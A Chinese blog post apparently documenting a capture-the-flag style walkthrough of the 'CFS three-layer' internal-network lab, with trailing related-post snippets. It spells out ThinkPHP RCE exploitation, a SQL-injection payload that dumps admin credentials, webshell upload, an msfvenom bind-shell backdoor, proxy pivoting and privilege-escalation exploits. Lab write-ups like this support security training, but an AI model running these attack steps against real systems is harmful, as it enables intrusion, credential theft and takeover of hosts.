cfs_三层渗透之曲折之路

已于 2024-05-10 17:54:01 修改
阅读量999 收藏 14
点赞数 37
文章标签: 安全
于 2024-05-10 17:39:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65575962/article/details/138673665
版权

推荐参考这个https://blog.csdn.net/weixin_65575962/article/details/138675207?spm=1001.2014.3001.5501​​​​​​​y

代理工具用nps工具,msf的代理工具不稳定

利用msf工具

攻击机kali ip地址:192.168.23.129

信息收集

       主机发现:

       模块:auxiliary/scanner/discovery/arp_sweep

操作命令

       利用探测模块

              use auxiliary/scanner/discovery/arp_sweep

       查看参数

              show options

       设置探测网段RHOSTS

              set RHOSTS 192.168.23.0/24

       运行模块

              run

       返回探测结果

主机为1,2为网关,得到存活主机ip:192.168.23.141

目标机为:192.168.23.141

进一步探测进行端口扫描

模块:auxiliary/scanner/portscan/tcp

操作命令

       利用端口探测模块:

              use auxiliary/scanner/portscan/tcp

       查看参数:

              show options

       设置探测ip地址RHOSTS

              set RHOSTS 192.168.23.141

       运行模块

              run

       返回探测结果

             

去网页访问80端口

得到80端口的服务版本

       thinkphp攻击模块:exploit/unix/webapp/thinkphp_rce

操作命令             

利用模块:

              use exploit/unix/webapp/thinkphp_rce

       查看参数:      
              show options

       设置参数:

              set RHOSTS 192.168.23.141

              set LHOST 192.168.23.143

              set RPORT 80

       执行

              run

获取shell

       进入meterpreter 查看主机

查看ip

              发现有第二块网卡

进行内网穿透

模块:auxiliary/server/socks_proxy

设置srvhost和srvport 为kali的IP地址和端口

查看是否监听

进行路由转发: post/multi/manage/autoroute

设置好session后会自动添加路由

查看路由信息  route

然后打开proxychains的配置文件 /etc/proxychains4.conf  添加socks代理信息

因为msf中设置的socks版本是5,所以添加socks5:

代理配置完成扫描c段看看是否还存在存活主机过程略

发现存在192.168.22.129主机存活

访问192.168.22.129

返回网页反现提示sql注入点和cms版本信息

用GOOGLE浏览器设置代理

访问192.168.22.129

进行sqlmap爆破

http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%23

解密登陆后台

http://192.168.22.129/index.php?r=admini/public/login后台地址(御剑扫出)

admin

123qwe

得到flag

写入一句话木马

配置蚁剑代理

连接

获取flag

继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它

生成正向后门木马为

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

通过蚁剑上传到目标机上更改权限为0777

打开窗口执行3.elf文件

(执行前)启用监听

use exploit/multi/handler

设置payload

set payload linux/x64/meterpreter/bind_tcp

set RHOST 192.168.22.129

设置监听端口

3333

启用监听

exploit

成功登入查看版本

发现新的ip

获取网络接口:run get_local_subnets

添加路由地址:run autoroute -s 192.168.33.0/24

查看路由地址:run autoroute -p

由于以上连接不稳定更改代理工具,重新进行渗透

配置nps工具

mkdir -p /nps/server  #创建多级目录

cd /nps/server

#下载到server目录下并解压

wget https://github.com/ehang-io/nps/releases/download/v0.26.9/linux_386_server.tar.gz

tar -zxvf linux_386_server.tar.gz

#解压后会含有一下目录及文件

# conf  nps  web

下载完服务器压缩包后,解压,然后进入解压后的文件夹

执行安装命令

./nps install

配置文件在 /etc/nps/conf/nps.conf ,只需要修改下面的webhost、账号、密码和端口号即可,其他可保持不变

admin

123

8088(端口号)

启动nps

nps start

参考文档

NPS内网穿透安装配置_nps官方文档-CSDN博客

重新进行渗透对每个靶机上传客户端nps发现没有权限执行

Target1进行提权

save保存设置的参数

post/multi/recon/local_exploit_suggester模块查找可利用session提权

可提权

设置参数

角色为root提权成功

Flag

部署代理

交互命令

python -c 'import pty;pty.spawn("/bin/bash")'

上传nps客户端解压安装

执行命令

开启

页面

开新窗口

Kali的流量会通过代理1流向靶机2

获取2的root过程同上

还是利用multi/recon/local_exploit_suggester通过sessio获取root

       未能获取权限

挂代理添加路由同上

访问192.168.33.128

能通

进行同段扫描

Target3

尝试扫描33网段

proxychains4 nmap -Pn -sT 192.168.33.33

发现开放着3389,445端口等这是windows系统利用永恒之蓝

这里nps不成功重新安装kali ip为192.168.23.143利用proxychains4 socks5进行代理

重新添加

用multi/recon/local_exploit_suggester利用sessio 2进行查找提权

发现用liunx2023.3版本可以查找出提权模块

利用exploit/linux/local/cve_2021_3493_overlayfs提权payload失败

略过提权进行渗透对windows渗透可以ping通

进行永恒之蓝渗透

憨憨448
关注
cfs_archive:cfs_archive
06-14
cfs_archive :StorNext 群集文件系统存档实用程序 用于在 StorNext 群集文件系统 (CFS) 和库上存档数据的应用程序。 客观的 StorNext 集群文件系统 (CFS) 可能非常庞大:数 PB 和数十亿个文件。 StorNext 的独特...
CFS三层宝塔内网渗透
m0_65096687的博客
04-09 772
1.靶场搭建自行百度一共有三个目标targetkali攻击机与targe1网段是一致。因为是内网渗透。进入正题直接访问目标主机,发现是thinkphp5。直接百度thinkphp5的exp发现利用漏洞上传一句话木马 上传后使用蚁剑进行连接拿到权限后输入 uname-a 来查看当前主机的操作系统然后在kali中msf线上找马生成一个linux x64 的木马然后使用蚁剑传入target1中获取shell(我是一个初学者,我我的理解是使用普通的蚁剑获取shell后再使用隧道代理会有些麻烦,我也不会。所以
渗透测试之CFS三层靶机内网渗透
LvHLong的博客
02-23 6519
一、环境搭建: 靶机拓扑: 1.添加虚拟网卡: 添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡: target1网络配置: target2网络配置: target3网络配置: 3.web靶机搭建(宝塔面板启动) 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能ping通ta..
cfs三层靶机——内网渗透
最新发布
记录学习
09-09 1510
内网渗透
CFS三层靶机搭建及其内网渗透
..
07-05 6761
CFS三层靶机搭建及其内网渗透,附靶场环境
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
CFS三层靶机内网渗透
AiENG_07的博客
12-05 1142
方法二、直接通过正向代理工具neo-regroge建立socks通道,导入流量(无法使用icmp探测存活)上传tunnel文件,建立连接。登录后:重点关注上传(头像、文件、编辑器)、导出(文件、sql语句)、自定义模版(网站结构、默认页面更改),ssrf。查找当前cms的历史漏洞,若无历史漏洞,下下策为找源代码审计,大部分系统不开源故不存在代码审计过程;接下来就可以开始内网渗透了,现在忘掉配置是的网卡信息,IP信息,后台信息等等,开始全真模拟。搭建正向代理,不需要在对方服务器中额外开通端口,利用后端代码。
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
cfs.rar_CFS聚类_announced1vd_cfs聚类算法_python_python 聚类
09-21
CFS(Correlation-based Feature Selection,基于相关性的特征选择)是一种经典的特征选择方法,它主要应用于数据挖掘和机器学习领域,用于减少数据集中的特征数量,从而提高模型的效率和性能。CFS算法的核心思想是...
sched_fair.rar_batch_cfs
09-22
在Linux操作系统中,调度器是核心组件之一,它负责决定哪个进程应该获得CPU的执行权。"Sched_fair.rar_batch_cfs" 提到的是完全公平调度器(Completely Fair Scheduler, CFS)中的两类任务调度策略:SCHED_NORMAL 和...
Linux专家之路_Linux内核源代码
05-10
"Linux专家之路_Linux内核源代码"这个主题涵盖了许多重要的知识点,包括但不限于以下内容: 1. **内核结构**:Linux内核由多个子系统组成,如进程管理、内存管理、文件系统、网络协议栈等。理解这些子系统的交互...
[内网渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 1318
在MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
CFS三层内网靶场实战
susixteen的博客
06-23 1406
CFS三层内网,内网渗透,内网漫游
CFS三层内网靶机渗透
Ays.Ie的博客
05-18 1519
CFS三层靶机渗透全过程
CFS三层内网渗透——第二层内网打点并拿下第三层内网(三)
weixin_74171325的博客
07-05 449
看到后台网页首页的源代码,如果有php一句话就开始尝试,没有就直接手动添加。该路径存在sql注入漏洞,利用sqlmap跑出账户和密码。因为他是在内网里面,配置socks流量转发代理。先上线再监听,因为这个是正向shell。
CFS三层内网渗透——进入二层内网并socks转发流量(二)
weixin_74171325的博客
07-05 934
生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问,不带命令参数的话就是简单的访问远程目标文件,不会进行下载。这里我拿kali来演示,先创建个要传输的文件,然后python开启监听。
CFS三层内网靶场渗透
Cfoxer的博客
10-25 2697
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。发现22网段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
CFS三层渗透
weixin_54855337的博客
03-13 231
添加蚁剑,这样流量就能到达22段了,这里发现使用msf模块的代理,然后主机使用代理软件,会存在问题,因为虚拟机的网络就是靠主机的虚拟网卡去提供的网络,所以无意义,也是测试的时候出现了问题,第一次的时候使用frp可以成功连接,为了实现的进行直接把shell文件上传到靶机。msf的代理不稳定,可以使用其他工具,比如frp等等,然后配置proxychines,利用proxychines打开msf,在msf里面手动添加路由,也是可以进行利用的。【靶机的详情都写了宝塔的访问地址以及管理员账户密码,默认IP】
void init_cfs_rq(struct cfs_rq *cfs_rq) { cfs_rq->tasks_timeline = RB_ROOT_CACHED; cfs_rq->min_vruntime = (u64)(-(1LL << 20)); #ifndef CONFIG_64BIT cfs_rq->min_vruntime_copy = cfs_rq->min_vruntime; #endif #ifdef CONFIG_SMP raw_spin_lock_init(&cfs_rq->removed.lock); #endif }
06-10
这是一个函数,用于初始化 CFS(Completely Fair Scheduler)调度器的运行队列(cfs_rq)。它的具体作用如下: 1. 将 tasks_timeline 属性初始化为一个空的红黑树,这个红黑树用于按照每个任务的虚拟运行时间...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值